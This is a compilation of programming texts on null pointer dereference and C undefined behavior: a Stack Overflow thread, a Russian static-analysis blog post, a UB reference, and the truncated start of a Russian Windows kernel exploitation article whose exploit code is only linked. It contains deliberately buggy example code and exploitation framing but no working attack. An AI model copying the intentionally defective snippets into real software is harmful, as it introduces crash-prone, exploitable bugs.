Ошибка null pointer dereference

i am just using cppcheck the code is working properly just cppcheck gives this errors.

void WorkerThread(WorkBuffer* m_buffer)
{
    std::cout << "Thread : " << m_buffer->m_id << ".....Starting" << std::endl;

    if (NULL == m_buffer)
        std::cout << "Thread : " << m_buffer->m_id << "......work buffer is null" << std::endl;


    while(!shut_down_flag)
    {
        int k = 0;
        //Sleep(1);
        SleepSystemUsec(100000);
        std::cout << "Thread : " << m_buffer->m_id << "....in while loop" << std::endl;
    } // of while(!shut_down_flag)

    std::cout << "Thread : " << m_buffer->m_id << ".....Request from main thread so ending working thread ...." << std::endl;
};

error : : Possible null pointer dereference: m_buffer — otherwise it is redundant to check it against null.

Sergey Kalinichenko's user avatar

asked Apr 20, 2015 at 14:20

user3521035's user avatar

3

if (NULL == m_buffer) 

makes sure m_buffer is NULL, and then you derefence it with

std::cout << "Thread : " << m_buffer->m_id << "......work buffer is null" << std::endl;
                            ^^^^^^^^^^^^^^^

this, which is only legal if m_buffer is not NULL (more precisely, only if it points to a correctly constructed WorkBuffer).

If NULL is a possible input for your function, you need to check for it before the very first dereference and then either make it point to something valid or leave the function without dereferencing.

answered Apr 20, 2015 at 14:24

Baum mit Augen's user avatar

Baum mit AugenBaum mit Augen

48.9k24 gold badges144 silver badges182 bronze badges

4

Not only is your condition backwards:

if m_buffer is NULL:
  do things that dereference m_buffer
(huh?!)

but you have no checks on any of the other output statements.

answered Apr 20, 2015 at 14:58

Lightness Races in Orbit's user avatar

Обнаружение в коде дефекта «разыменование нулевого указателя»

Этой статьей мы открываем серию публикаций, посвященных обнаружению ошибок и уязвимостей в open-source проектах с помощью статического анализатора кода AppChecker. В рамках этой серии будут рассмотрены наиболее часто встречающиеся дефекты в программном коде, которые могут привести к серьезным уязвимостям. Сегодня мы остановимся на дефекте типа «разыменование нулевого указателя».

Разыменование нулевого указателя (CWE-476) представляет собой дефект, когда программа обращается по некорректному указателю к какому-то участку памяти. Такое обращение ведет к неопределенному поведению программы, что приводит в большинстве случаев к аварийному завершению программы.

Ниже приведен пример обращения по нулевому указателю. В данном случае, скорее всего, программа отработает без выдачи сообщений об ошибках.

#include <iostream>
class A {
        public:
            void bar() {
                std::cout << "Test!n";
            }
};

int main() {
    A* a = 0;
    a->bar();
    return 0;
}

А теперь рассмотрим пример, в котором программа аварийно завершит свою работу. Пример очень похож на предыдущий, но с небольшим отличием.

#include <iostream>
class A {
        int x;
        public:
            void bar() {
                std::cout << x << "Test!n";
            }
};

int main() {
    A* a = 0;
    a->bar();
    return 0;
}

Почему же в одном случае программа отработает нормально, а в другом нет? Дело в том, что во втором случае вызываемый метод обращается к одному из полей нулевого объекта, что приведет к считыванию информации из непредсказуемой области адресного пространства. В первом же случае в методе нет обращения к полям объекта, поэтому программа скорее всего завершится корректно.

Рассмотрим следующий фрагмент кода на C++:

if( !pColl )
   pColl->SetNextTxtFmtColl( *pDoc->GetTxtCollFromPool( nNxt ));

Нетрудно заметить, что если pColl == NULL, выполнится тело этого условного оператора. Однако в теле оператора происходит разыменование указателя pColl, что вероятно приведет к краху программы.

Обычно такие дефекты возникают из-за невнимательности разработчика. Чаще всего блоки такого типа применяются в коде для обработки ошибок. Для выявления таких дефектов можно применить различные методы статического анализа, например, сигнатурный анализа или symbolic execution. В первом случае пишется сигнатура, которая ищет в абстрактном синтаксическом дереве (AST) узел типа «условный оператор», в условии которого есть выражение вида! а, a==0 и пр., а в теле оператора есть обращение к этому объекту или разыменование этого указателя. После этого необходимо отфильтровать ложные срабатывания, например, перед разыменованием этой переменной может присвоиться значение:

if(!a) {
  a = new A();
  a->bar();
}

Выражение в условии может быть нетривиальным.

Во втором случае во время работы анализатор «следит», какие значения могут иметь переменные. После обработки условия if (!a) анализатор понимает, что в теле условного оператора переменная a равна нулю. Соответственно, ее разыменование можно считать ошибкой.

Приведенный фрагмент кода взят из популярного свободного пакета офисных приложений Apache OpenOffice версии 4.1.2. Дефект в коде был обнаружен при помощи статического анализатора программного кода AppChecker. Разработчики были уведомлены об этом дефекте, и выпустили патч, в котором этот дефект был исправлен ).

Рассмотрим аналогичный дефект, обнаруженный в Oracle MySQL Server 5.7.10:

bool sp_check_name(LEX_STRING *ident)
{
  if (!ident || !ident->str || !ident->str[0] ||
      ident->str[ident->length-1] == ' ')
  {
    my_error(ER_SP_WRONG_NAME, MYF(0), ident->str);
    return true;
  }
..
}

В этом примере если ident равен 0, то условие будет истинным и выполнится строка:

my_error(ER_SP_WRONG_NAME, MYF(0), ident->str);

что приведет к разыменованию нулевого указателя. По всей видимости разработчик в процессе написания этого фрагмента кода, в котором ловятся ошибки, просто не учел, что такая ситуация может возникнуть. Правильным решением было бы сделать отдельный обработчик ошибок в случае, когда ident=0.

Нетрудно догадаться, что разыменование нулевого указателя – это дефект, не зависящий от языка программирования. Предыдущие два примера демонстрировали код на языке C++, однако с помощью статического анализатора AppChecker можно находить подобные проблемы в проектах на языках Java и PHP. Приведем соответствующие примеры.

Рассмотрим фрагмент кода системы управления и централизации информации о строительстве BIM Server версии bimserver 1.4.0-FINAL-2015-11-04, написанной на языке Java:

if (requestUri.equals("") || requestUri.equals("/") || requestUri == null) {
     requestUri = "/index.html";
}

В данном примере сначала идет обращение к переменной requestUri и только после этого происходит проверка на нулевой указатель. Для того чтобы избежать этого дефекта, достаточно было просто поменять очередность выполнения этих действий.

Теперь рассмотрим фрагмент кода популярной коллекции веб-приложений phabricator, написанной на php:

if (!$device) {
    throw new Exception(
      pht(
        'Invalid device name ("%s"). There is no device with this name.',
        $device->getName()));
}

В данном случае условие выполняется только если $device = NULL, однако затем происходит обращение к $device->getName(), что приведет к fatal error.

Подобные дефекты могут оставаться незамеченными очень долго, но в какой-то момент условие выполнится, что приведет к краху программы. Несмотря на простоту и кажущуюся банальность такого рода дефектов, они встречаются достаточно часто, как в open-source, так и в коммерческих проектах.

Update:

Ссылка на бесплатную версию AppChecker: https://file.cnpo.ru/index.php/s/o1cLkNrUX4plHMV

Introduction

In C, some expressions yield undefined behavior. The standard explicitly chooses to not define how a compiler should behave if it encounters such an expression. As a result, a compiler is free to do whatever it sees fit and may produce useful results, unexpected results, or even crash.

Code that invokes UB may work as intended on a specific system with a specific compiler, but will likely not work on another system, or with a different compiler, compiler version or compiler settings.

What is Undefined Behavior (UB)?

Undefined behavior is a term used in the C standard. The C11 standard (ISO/IEC 9899:2011) defines the term undefined behavior as

behavior, upon use of a nonportable or erroneous program construct or of erroneous data, for which this International Standard imposes no requirements

What happens if there is UB in my code?

These are the results which can happen due to undefined behavior according to standard:

NOTE Possible undefined behavior ranges from ignoring the situation
completely with unpredictable results, to behaving during translation
or program execution in a documented manner characteristic of the
environment (with or without the issuance of a diagnostic message), to
terminating a translation or execution (with the issuance of a
diagnostic message).

The following quote is often used to describe (less formally though) results happening from undefined behavior:

“When the compiler encounters [a given undefined construct] it is
legal for it to make demons fly out of your nose” (the implication is
that the compiler may choose any arbitrarily bizarre way to interpret
the code without violating the ANSI C standard)

Why does UB exist?

If it’s so bad, why didn’t they just define it or make it implementation-defined?

Undefined behavior allows more opportunities for optimization; The compiler can justifiably assume that any code does not contain undefined behaviour, which can allow it to avoid run-time checks and perform optimizations whose validity would be costly or impossible to prove otherwise.

Why is UB hard to track down?

There are at least two reasons why undefined behavior creates bugs that are difficult to detect:

  • The compiler is not required to — and generally can’t reliably — warn you about undefined behavior. In fact requiring it to do so would go directly against the reason for the existence of undefined behaviour.
  • The unpredictable results might not start unfolding at the exact point of the operation where the construct whose behavior is undefined occurs; Undefined behaviour taints the whole execution and its effects may happen at any time: During, after, or even before the undefined construct.

Consider null-pointer dereference: the compiler is not required to diagnose null-pointer dereference, and even could not, as at run-time any pointer passed into a function, or in a global variable might be null. And when the null-pointer dereference occurs, the standard does not mandate that the program needs to crash. Rather, the program might crash earlier, later, or not crash at all; it could even behave as if the null pointer pointed to a valid object, and behave completely normally, only to crash under other circumstances.

In the case of null-pointer dereference, C language differs from managed languages such as Java or C#, where the behavior of null-pointer dereference is defined: an exception is thrown, at the exact time (NullPointerException in Java, NullReferenceException in C#), thus those coming from Java or C# might incorrectly believe that in such a case, a C program must crash, with or without the issuance of a diagnostic message.

Additional information

There are several such situations that should be clearly distinguished:

  • Explicitly undefined behavior, that is where the C standard explicitly tells you that you are off limits.
  • Implicitly undefined behavior, where there is simply no text in the standard that foresees a behavior for the situation you brought your program in.

Also have in mind that in many places the behavior of certain constructs is deliberately undefined by the C standard to leave room for compiler and library implementors to come up with their own definitions. A good example are signals and signal handlers, where extensions to C, such as the POSIX operating system standard, define much more elaborated rules. In such cases you just have to check the documentation of your platform; the C standard can’t tell you anything.

Also note that if undefined behavior occurs in program it doesn’t mean that just the point where undefined behavior occurred is problematic, rather entire program becomes meaningless.

Because of such concerns it is important (especially since compilers don’t always warn us about UB) for person programming in C to be at least familiar with the kind of things that trigger undefined behavior.

It should be noted there are some tools (e.g. static analysis tools such as PC-Lint) which aid in detecting undefined behavior, but again, they can’t detect all occurrences of undefined behavior.

Dereferencing a null pointer

This is an example of dereferencing a NULL pointer, causing undefined behavior.

int * pointer = NULL;
int value = *pointer; /* Dereferencing happens here */

A NULL pointer is guaranteed by the C standard to compare unequal to any pointer to a valid object, and dereferencing it invokes undefined behavior.

Modifying any object more than once between two sequence points

int i = 42;
i = i++; /* Assignment changes variable, post-increment as well */
int a = i++ + i--;

Code like this often leads to speculations about the «resulting value» of i. Rather than specifying an outcome, however, the C standards specify that evaluating such an expression produces undefined behavior. Prior to C2011, the standard formalized these rules in terms of so-called sequence points:

Between the previous and next sequence point a scalar object shall have its stored value modified at most once by the evaluation of an expression. Furthermore, the prior value shall be read only to determine the value to be stored.

(C99 standard, section 6.5, paragraph 2)

That scheme proved to be a little too coarse, resulting in some expressions exhibiting undefined behavior with respect to C99 that plausibly should not do. C2011 retains sequence points, but introduces a more nuanced approach to this area based on sequencing and a relationship it calls «sequenced before»:

If a side effect on a scalar object is unsequenced relative to either a different side effect on the same scalar object or a value computation using the value of the same scalar object, the behavior is undefined. If there are multiple allowable orderings of the subexpressions of an expression, the behavior is undefined if such an unsequenced side effect occurs in any of the orderings.

(C2011 standard, section 6.5, paragraph 2)

The full details of the «sequenced before» relation are too long to describe here, but they supplement sequence points rather than supplanting them, so they have the effect of defining behavior for some evaluations whose behavior previously was undefined. In particular, if there is a sequence point between two evaluations, then the one before the sequence point is «sequenced before» the one after.

The following example has well-defined behaviour:

int i = 42;
i = (i++, i+42); /* The comma-operator creates a sequence point */

The following example has undefined behaviour:

int i = 42;
printf("%d %dn", i++, i++); /* commas as separator of function arguments are not comma-operators */

As with any form of undefined behavior, observing the actual behavior of evaluating expressions that violate the sequencing rules is not informative, except in a retrospective sense. The language standard provides no basis for expecting such observations to be predictive even of the future behavior of the same program.

Missing return statement in value returning function

int foo(void) {
  /* do stuff */
  /* no return here */
}

int main(void) {
  /* Trying to use the (not) returned value causes UB */
  int value = foo();
  return 0;
}

When a function is declared to return a value then it has to do so on every possible code path through it. Undefined behavior occurs as soon as the caller (which is expecting a return value) tries to use the return value1.

Note that the undefined behaviour happens only if the caller attempts to use/access the value from the function. For example,

int foo(void) {
  /* do stuff */
  /* no return here */
}

int main(void) {
  /* The value (not) returned from foo() is unused. So, this program
   * doesn't cause *undefined behaviour*. */
  foo();
  return 0;
}

C99

The main() function is an exception to this rule in that it is possible for it to be terminated without a return statement because an assumed return value of 0 will automatically be used in this case2.


1 (ISO/IEC 9899:201x, 6.9.1/12)

If the } that terminates a function is reached, and the value of the function call is used by the caller, the behavior is undefined.

2 (ISO/IEC 9899:201x, 5.1.2.2.3/1)

reaching the } that terminates the main function returns a value of 0.

Signed integer overflow

Per paragraph 6.5/5 of both C99 and C11, evaluation of an expression produces undefined behavior if the result is not a representable value of the expression’s type. For arithmetic types, that’s called an overflow. Unsigned integer arithmetic does not overflow because paragraph 6.2.5/9 applies, causing any unsigned result that otherwise would be out of range to be reduced to an in-range value. There is no analogous provision for signed integer types, however; these can and do overflow, producing undefined behavior. For example,

#include <limits.h>      /* to get INT_MAX */

int main(void) {
    int i = INT_MAX + 1; /* Overflow happens here */
    return 0;
}

Most instances of this type of undefined behavior are more difficult to recognize or predict. Overflow can in principle arise from any addition, subtraction, or multiplication operation on signed integers (subject to the usual arithmetic conversions) where there are not effective bounds on or a relationship between the operands to prevent it. For example, this function:

int square(int x) {
    return x * x;  /* overflows for some values of x */
}

is reasonable, and it does the right thing for small enough argument values, but its behavior is undefined for larger argument values. You cannot judge from the function alone whether programs that call it exhibit undefined behavior as a result. It depends on what arguments they pass to it.

On the other hand, consider this trivial example of overflow-safe signed integer arithmetic:

int zero(int x) {
    return x - x;  /* Cannot overflow */
}

The relationship between the operands of the subtraction operator ensures that the subtraction never overflows. Or consider this somewhat more practical example:

int sizeDelta(FILE *f1, FILE *f2) {
    int count1 = 0;
    int count2 = 0;
    while (fgetc(f1) != EOF) count1++;  /* might overflow */
    while (fgetc(f2) != EOF) count2++;  /* might overflow */

    return count1 - count2; /* provided no UB to this point, will not overflow */
}

As long as that the counters do not overflow individually, the operands of the final subtraction will both be non-negative. All differences between any two such values are representable as int.

Use of an uninitialized variable

int a; 
printf("%d", a);

The variable a is an int with automatic storage duration. The example code above is trying to print the value of an uninitialized variable (a was never initialized). Automatic variables which are not initialized have indeterminate values; accessing these can lead to undefined behavior.

Note: Variables with static or thread local storage, including global variables without the static keyword, are initialized to either zero, or their initialized value. Hence the following is legal.

static int b;
printf("%d", b);

A very common mistake is to not initialize the variables that serve as counters to 0. You add values to them, but since the initial value is garbage, you will invoke Undefined Behavior, such as in the question Compilation on terminal gives off pointer warning and strange symbols.

Example:

#include <stdio.h>

int main(void) {
    int i, counter;
    for(i = 0; i < 10; ++i)
        counter += i;
    printf("%dn", counter);
    return 0;
}

Output:

C02QT2UBFVH6-lm:~ gsamaras$ gcc main.c -Wall -o main
main.c:6:9: warning: variable 'counter' is uninitialized when used here [-Wuninitialized]
        counter += i;
        ^~~~~~~
main.c:4:19: note: initialize the variable 'counter' to silence this warning
    int i, counter;
                  ^
                   = 0
1 warning generated.
C02QT2UBFVH6-lm:~ gsamaras$ ./main
32812

The above rules are applicable for pointers as well. For example, the following results in undefined behavior

int main(void)
{
    int *p;
    p++; // Trying to increment an uninitialized pointer.
}

Note that the above code on its own might not cause an error or segmentation fault, but trying to dereference this pointer later would cause the undefined behavior.

Dereferencing a pointer to variable beyond its lifetime

int* foo(int bar)
{
    int baz = 6;
    baz += bar;
    return &baz; /* (&baz) copied to new memory location outside of foo. */
} /* (1) The lifetime of baz and bar end here as they have automatic storage   
   * duration (local variables), thus the returned pointer is not valid! */

int main (void)
{
    int* p;

    p = foo(5);  /* (2) this expression's behavior is undefined */
    *p = *p - 6; /* (3) Undefined behaviour here */

    return 0;
}

Some compilers helpfully point this out. For example, gcc warns with:

warning: function returns address of local variable [-Wreturn-local-addr]

and clang warns with:

warning: address of stack memory associated with local variable 'baz' returned 
[-Wreturn-stack-address]

for the above code. But compilers may not be able to help in complex code.

(1) Returning reference to variable declared static is defined behaviour, as the variable is not destroyed after leaving current scope.

(2) According to ISO/IEC 9899:2011 6.2.4 §2, «The value of a pointer becomes indeterminate when the object it points to reaches the end of its lifetime.»

(3) Dereferencing the pointer returned by the function foo is undefined behaviour as the memory it references holds an indeterminate value.

Division by zero

int x = 0;
int y = 5 / x;  /* integer division */

or

double x = 0.0;
double y = 5.0 / x;  /* floating point division */

or

int x = 0;
int y = 5 % x;  /* modulo operation */

For the second line in each example, where the value of the second operand (x) is zero, the behaviour is undefined.

Note that most implementations of floating point math will follow a standard (e.g. IEEE 754), in which case operations like divide-by-zero will have consistent results (e.g., INFINITY) even though the C standard says the operation is undefined.

Accessing memory beyond allocated chunk

A a pointer to a piece of memory containing n elements may only be dereferenced if it is in the range memory and memory + (n - 1). Dereferencing a pointer outside of that range results in undefined behavior. As an example, consider the following code:

int array[3];
int *beyond_array = array + 3;
*beyond_array = 0; /* Accesses memory that has not been allocated. */

The third line accesses the 4th element in an array that is only 3 elements long, leading to undefined behavior. Similarly, the behavior of the second line in the following code fragment is also not well defined:

int array[3];
array[3] = 0;

Note that pointing past the last element of an array is not undefined behavior (beyond_array = array + 3 is well defined here), but dereferencing it is (*beyond_array is undefined behavior). This rule also holds for dynamically allocated memory (such as buffers created through malloc).

Copying overlapping memory

A wide variety of standard library functions have among their effects copying byte sequences from one memory region to another. Most of these functions have undefined behavior when the source and destination regions overlap.

For example, this …

#include <string.h> /* for memcpy() */

char str[19] = "This is an example";
memcpy(str + 7, str, 10);

… attempts to copy 10 bytes where the source and destination memory areas overlap by three bytes. To visualize:

               overlapping area
               |
               _ _
              |   |
              v   v
T h i s   i s   a n   e x a m p l e 
^             ^
|             |
|             destination
|
source

Because of the overlap, the resulting behavior is undefined.

Among the standard library functions with a limitation of this kind are memcpy(), strcpy(), strcat(), sprintf(), and sscanf(). The standard says of these and several other functions:

If copying takes place between objects that overlap, the behavior
is undefined.

The memmove() function is the principal exception to this rule. Its definition specifies that the function behaves as if the source data were first copied into a temporary buffer and then written to the destination address. There is no exception for overlapping source and destination regions, nor any need for one, so memmove() has well-defined behavior in such cases.

The distinction reflects an efficiency vs. generality tradeoff. Copying such as these functions perform usually occurs between disjoint regions of memory, and often it is possible to know at development time whether a particular instance of memory copying will be in that category. Assuming non-overlap affords comparatively more efficient implementations that do not reliably produce correct results when the assumption does not hold. Most C library functions are allowed the more efficient implementations, and memmove() fills in the gaps, serving the cases where the source and destination may or do overlap. To produce the correct effect in all cases, however, it must perform additional tests and / or employ a comparatively less efficient implementation.

Reading an uninitialized object that is not backed by memory

C11

Reading an object will cause undefined behavior, if the object is1:

  • uninitialized
  • defined with automatic storage duration
  • it’s address is never taken

The variable a in the below example satisfies all those conditions:

void Function( void )
{
    int a;
    int b = a;
} 

1 (Quoted from: ISO:IEC 9899:201X 6.3.2.1 Lvalues, arrays, and function designators 2)
If the lvalue designates an object of automatic storage duration that could have been declared with the register storage class (never had its address taken), and that object is uninitialized (not declared with an initializer and no assignment to it has been performed prior to use), the behavior is undefined.

Data race

C11

C11 introduced support for multiple threads of execution, which affords the possibility of data races. A program contains a data race if an object in it is accessed1 by two different threads, where at least one of the accesses is non-atomic, at least one modifies the object, and program semantics fail to ensure that the two accesses cannot overlap temporally.2 Note well that actual concurrency of the accesses involved is not a condition for a data race; data races cover a broader class of issues arising from (allowed) inconsistencies in different threads’ views of memory.

Consider this example:

#include <threads.h>

int a = 0;

int Function( void* ignore )
{
    a = 1;

    return 0;
}

int main( void )
{
    thrd_t id;
    thrd_create( &id , Function , NULL );

    int b = a;

    thrd_join( id , NULL );
}

The main thread calls thrd_create to start a new thread running function Function. The second thread modifies a, and the main thread reads a. Neither of those access is atomic, and the two threads do nothing either individually or jointly to ensure that they do not overlap, so there is a data race.

Among the ways this program could avoid the data race are

  • the main thread could perform its read of a before starting the other thread;
  • the main thread could perform its read of a after ensuring via thrd_join that the other has terminated;
  • the threads could synchronize their accesses via a mutex, each one locking that mutex before accessing a and unlocking it afterward.

As the mutex option demonstrates, avoiding a data race does not require ensuring a specific order of operations, such as the child thread modifying a before the main thread reads it; it is sufficient (for avoiding a data race) to ensure that for a given execution, one access will happen before the other.


1 Modifying or reading an object.

2 (Quoted from ISO:IEC 9889:201x, section 5.1.2.4 «Multi-threaded executions and data races»)
The execution of a program contains a data race if it contains two conflicting actions in different threads, at least one of which is not atomic, and neither happens before the other. Any such data race results in undefined behavior.

Read value of pointer that was freed

Even just reading the value of a pointer that was freed (i.e. without trying to dereference the pointer) is undefined behavior(UB), e.g.

char *p = malloc(5);
free(p);
if (p == NULL) /* NOTE: even without dereferencing, this may have UB */
{

}

Quoting ISO/IEC 9899:2011, section 6.2.4 §2:

[…] The value of a pointer becomes indeterminate when the object it points
to (or just past) reaches the end of its lifetime.

The use of indeterminate memory for anything, including apparently harmless comparison or arithmetic, can have undefined behavior if the value can be a trap representation for the type.

Modify string literal

In this code example, the char pointer p is initialized to the address of a string literal. Attempting to modify the string literal has undefined behavior.

char *p = "hello world";
p[0] = 'H'; // Undefined behavior

However, modifying a mutable array of char directly, or through a pointer is naturally not undefined behavior, even if its initializer is a literal string. The following is fine:

char a[] = "hello, world";
char *p = a;

a[0] = 'H';
p[7] = 'W';

That’s because the string literal is effectively copied to the array each time the array is initialized (once for variables with static duration, each time the array is created for variables with automatic or thread duration — variables with allocated duration aren’t initialized), and it is fine to modify array contents.

Freeing memory twice

Freeing memory twice is undefined behavior, e.g.

int * x = malloc(sizeof(int));
*x = 9;
free(x);
free(x);

Quote from standard(7.20.3.2. The free function of C99 ):

Otherwise, if the argument does not match a pointer earlier returned
by the calloc, malloc, or realloc function, or if the space has been
deallocated by a call to free or realloc, the behavior is undefined.

Using incorrect format specifier in printf

Using an incorrect format specifier in the first argument to printf invokes undefined behavior.
For example, the code below invokes undefined behavior:

long z = 'B';
printf("%cn", z);

Here is another example

printf("%fn",0);

Above line of code is undefined behavior. %f expects double. However 0 is of type int.

Note that your compiler usually can help you avoid cases like these, if you turn on the proper flags during compiling (-Wformat in clang and gcc). From the last example:

warning: format specifies type 'double' but the argument has type
      'int' [-Wformat]
    printf("%fn",0);
            ~~    ^
            %d

Conversion between pointer types produces incorrectly aligned result

The following might have undefined behavior due to incorrect pointer alignment:

 char *memory_block = calloc(sizeof(uint32_t) + 1, 1);
 uint32_t *intptr = (uint32_t*)(memory_block + 1);  /* possible undefined behavior */
 uint32_t mvalue = *intptr;

The undefined behavior happens as the pointer is converted. According to C11, if a conversion between two pointer types produces a result that is incorrectly aligned (6.3.2.3), the behavior is undefined. Here an uint32_t could require alignment of 2 or 4 for example.

calloc on the other hand is required to return a pointer that is suitably aligned for any object type; thus memory_block is properly aligned to contain an uint32_t in its initial part. Then, on a system where uint32_t has required alignment of 2 or 4, memory_block + 1 will be an odd address and thus not properly aligned.

Observe that the C standard requests that already the cast operation is undefined. This is imposed because on platforms where addresses are segmented, the byte address memory_block + 1 may not even have a proper representation as an integer pointer.

Casting char * to pointers to other types without any concern to alignment requirements is sometimes incorrectly used for decoding packed structures such as file headers or network packets.

You can avoid the undefined behavior arising from misaligned pointer conversion by using memcpy:

memcpy(&mvalue, memory_block + 1, sizeof mvalue);

Here no pointer conversion to uint32_t* takes place and the bytes are copied one by one.

This copy operation for our example only leads to valid value of mvalue because:

  • We used calloc, so the bytes are properly initialized. In our case all bytes have value 0, but any other proper initialization would do.
  • uint32_t is an exact width type and has no padding bits
  • Any arbitrary bit pattern is a valid representation for any unsigned type.

Addition or subtraction of pointer not properly bounded

The following code has undefined behavior:

char buffer[6] = "hello";
char *ptr1 = buffer - 1;  /* undefined behavior */
char *ptr2 = buffer + 5;  /* OK, pointing to the '' inside the array */
char *ptr3 = buffer + 6;  /* OK, pointing to just beyond */
char *ptr4 = buffer + 7;  /* undefined behavior */

According to C11, if addition or subtraction of a pointer into, or just beyond, an array object and an integer type produces a result that does not point into, or just beyond, the same array object, the behavior is undefined (6.5.6).

Additionally it is naturally undefined behavior to dereference a pointer that points to just beyond the array:

char buffer[6] = "hello";
char *ptr3 = buffer + 6;  /* OK, pointing to just beyond */
char value = *ptr3;       /* undefined behavior */

Modifying a const variable using a pointer

int main (void)
{
    const int foo_readonly = 10;
    int *foo_ptr;

    foo_ptr = (int *)&foo_readonly; /* (1) This casts away the const qualifier */
    *foo_ptr = 20; /* This is undefined behavior */

    return 0;
}

Quoting ISO/IEC 9899:201x, section 6.7.3 §2:

If an attempt is made to modify an object defined with a const-qualified type through use
of an lvalue with non-const-qualified type, the behavior is undefined. […]


(1) In GCC this can throw the following warning: warning: assignment discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]

Passing a null pointer to printf %s conversion

The %s conversion of printf states that the corresponding argument a pointer to the initial element of an array of character type. A null pointer does not point to the initial element of any array of character type, and thus the behavior of the following is undefined:

char *foo = NULL;
printf("%s", foo); /* undefined behavior */

However, the undefined behavior does not always mean that the program crashes — some systems take steps to avoid the crash that normally happens when a null pointer is dereferenced. For example Glibc is known to print

(null)

for the code above. However, add (just) a newline to the format string and you will get a crash:

char *foo = 0;
printf("%sn", foo); /* undefined behavior */

In this case, it happens because GCC has an optimization that turns printf("%sn", argument); into a call to puts with puts(argument), and puts in Glibc does not handle null pointers. All this behavior is standard conforming.

Note that null pointer is different from an empty string. So, the following is valid and has no undefined behaviour. It’ll just print a newline:

char *foo = "";
printf("%sn", foo);

Inconsistent linkage of identifiers

extern int var;
static int var; /* Undefined behaviour */

C11, §6.2.2, 7 says:

If, within a translation unit, the same identifier appears with both
internal and external linkage, the behavior is undefined.

Note that if an prior declaration of an identifier is visible then it’ll have the prior declaration’s linkage. C11, §6.2.2, 4 allows it:

For an identifier declared with the storage-class specifier extern in a
scope in which a prior declaration of that identifier is visible,31) if
the prior declaration specifies internal or external linkage, the
linkage of the identifier at the later declaration is the same as the
linkage specified at the prior declaration. If no prior declaration is
visible, or if the prior declaration specifies no linkage, then the
identifier has external linkage.

/* 1. This is NOT undefined */
static int var;
extern int var; 


/* 2. This is NOT undefined */
static int var;
static int var; 

/* 3. This is NOT undefined */
extern int var;
extern int var; 

Using fflush on an input stream

The POSIX and C standards explicitly state that using fflush on an input stream is undefined behavior. The fflush is defined only for output streams.

#include <stdio.h>

int main()
{
    int i;
    char input[4096];

    scanf("%i", &i);
    fflush(stdin); // <-- undefined behavior
    gets(input);

    return 0;
}

There is no standard way to discard unread characters from an input stream. On the other hand, some implementations uses fflush to clear stdin buffer. Microsoft defines the behavior of fflush on an input stream: If the stream is open for input, fflush clears the contents of the buffer. According to POSIX.1-2008, the behavior of fflush is undefined unless the input file is seekable.

See Using fflush(stdin) for many more details.

Bit shifting using negative counts or beyond the width of the type

If the shift count value is a negative value then both left shift and right shift operations are undefined1:

int x = 5 << -3; /* undefined */
int x = 5 >> -3; /* undefined */

If left shift is performed on a negative value, it’s undefined:

int x = -5 << 3; /* undefined */

If left shift is performed on a positive value and result of the mathematical value is not representable in the type, it’s undefined1:

/* Assuming an int is 32-bits wide, the value '5 * 2^72' doesn't fit 
 * in an int. So, this is undefined. */
       
int x = 5 << 72;

Note that right shift on a negative value (.e.g -5 >> 3) is not undefined but implementation-defined.


1 Quoting ISO/IEC 9899:201x, section 6.5.7:

If the value of the right operand is negative or is greater than or equal to the width of the promoted left operand, the behavior is undefined.

Modifying the string returned by getenv, strerror, and setlocale functions

Modifying the strings returned by the standard functions getenv(), strerror() and setlocale() is undefined. So, implementations may use static storage for these strings.

The getenv() function, C11, §7.22.4.7, 4, says:

The getenv function returns a pointer to a string associated with the
matched list member. The string pointed to shall not be modified by the
program, but may be overwritten by a subsequent call to the getenv
function.

The strerror() function, C11, §7.23.6.3, 4 says:

The strerror function returns a pointer to the string, the contents of
which are localespecific. The array pointed to shall not be modified by
the program, but may be overwritten by a subsequent call to the
strerror function.

The setlocale() function, C11, §7.11.1.1, 8 says:

The pointer to string returned by the setlocale function is such that
a subsequent call with that string value and its associated category
will restore that part of the program’s locale. The string pointed to
shall not be modified by the program, but may be overwritten by a
subsequent call to the setlocale function.

Similarly the localeconv() function returns a pointer to struct lconv which shall not be modified.

The localeconv() function, C11, §7.11.2.1, 8 says:

The localeconv function returns a pointer to the filled-in object. The
structure pointed to by the return value shall not be modified by the
program, but may be overwritten by a subsequent call to the localeconv
function.

Returning from a function that’s declared with `_Noreturn` or `noreturn` function specifier

C11

The function specifier _Noreturn was introduced in C11. The header <stdnoreturn.h> provides a macro noreturn which expands to _Noreturn. So using _Noreturn or noreturn from <stdnoreturn.h> is fine and equivalent.

A function that’s declared with _Noreturn (or noreturn) is not allowed to return to its caller. If such a function does return to its caller, the behavior is undefined.

In the following example, func() is declared with noreturn specifier but it returns to its caller.

#include <stdio.h>
#include <stdlib.h>
#include <stdnoreturn.h>

noreturn void func(void);

void func(void)
{
    printf("In func()...n");
} /* Undefined behavior as func() returns */

int main(void)
{
    func();
    return 0;
}

gcc and clang produce warnings for the above program:

$ gcc test.c
test.c: In function ‘func’:
test.c:9:1: warning: ‘noreturn’ function does return
 }
 ^
$ clang test.c
test.c:9:1: warning: function declared 'noreturn' should not return [-Winvalid-noreturn]
}
^

An example using noreturn that has well-defined behavior:

#include <stdio.h>
#include <stdlib.h>
#include <stdnoreturn.h>

noreturn void my_exit(void);

/* calls exit() and doesn't return to its caller. */
void my_exit(void)
{
    printf("Exiting...n");
    exit(0);
}

int main(void)
{
    my_exit();
    return 0;
}

Эксплуатация уязвимостей уровня ядра в ОС Windows. Часть 6 – Разыменование пустого указателя

Кучи представляют собой динамически выделяемые области памяти в отличие от стека, размер которого фиксирован.

Автор: Mohamed Shahat

Код эксплоита находится здесь.

Кучи (пулы) в режиме ядра

Кучи представляют собой динамически выделяемые области памяти в отличие от стека, размер которого фиксирован.

Кучи, размещаемые для компонентов в режиме ядра, называются пулами и делятся на два основных типа:

  • Невытесняемый пул (non-paged pool): эти пулы гарантировано находятся в оперативной памяти и в основном используются для хранения данных, к которым будет доступ во время аппаратного прерывания (в тот момент, когда система не может обрабатывать ошибки страниц памяти). Выделение подобной памяти выполняется через процедуру ExAllocatePoolWithTag.
  • Вытесняемый пул (paged pool): этот тип памяти может вытесняться внутрь и наружу файла подкачки, который обычно располагается в корневой директории Windows (например, C:pagefile.sys).

Выделение такой памяти выполняется через процедуру ExAllocatePoolWithTag с указанием типа пула (параметр poolType) и 4-байтового «тега».

Для мониторинга выделений пулов можно пользоваться утилитой poolmon.

Если вы хотите поглубже вникнуть в тему, связанную с пулами, рекомендую ознакомиться со статьей «Pushing the Limits of Windows: Paged and Nonpaged Pool» (и всеми остальными частями из данной серии тоже).

Суть уязвимости

Код находится здесь.

